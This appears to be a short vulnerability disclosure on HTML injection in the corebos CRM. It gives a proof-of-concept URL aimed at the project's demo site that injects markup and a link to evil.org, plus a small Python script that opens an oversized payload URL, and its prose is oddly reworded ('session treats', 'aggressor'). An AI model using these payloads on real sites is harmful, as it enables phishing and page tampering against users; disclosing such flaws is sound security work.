Code Injection in tsolucio/corebos
Nov 6th 2021
The user can control a point and infuse arbitrary HTML code into a vulnerable web page. This vulnerability can have numerous results, like disclosure of a user’s session treats that might be utilized to impersonate the victim, or, more generally, it can permit the aggressor to alter the page substance seen by the victims.
Proof of Concept
Go to:: http://demo.corebos.com/index.php?action=%3Ch%3EHTML-Injection%3C/h%3E%3Cp%3Ehello%3C/p%3E%3Cp%3Ehai%3C/p%3E%3Ch1%3ECONTENT%3C/h1%3E%3Ca%20href=https://evil.org%3EMalicious-Link%3C/a%3E&module=Home // PoC.py (Content Injection Length) import webbrowser payload = "| 7h3h4ckv157 |" * 354 url = "http://demo.corebos.com/index.php?action=" + payload + "&module=Home" webbrowser.open(url)
HTML Injection: Malicious URL + Content
An injection permits the attacker to send a malicious HTML page to a victim. The targeted browser will not be able to recognize genuine parts from malicious parts of the page, and subsequently will parse and execute the entire page within the victim’s context. Attacker is able to control an input point and is able to inject subjective HTML code into a vulnerable web page.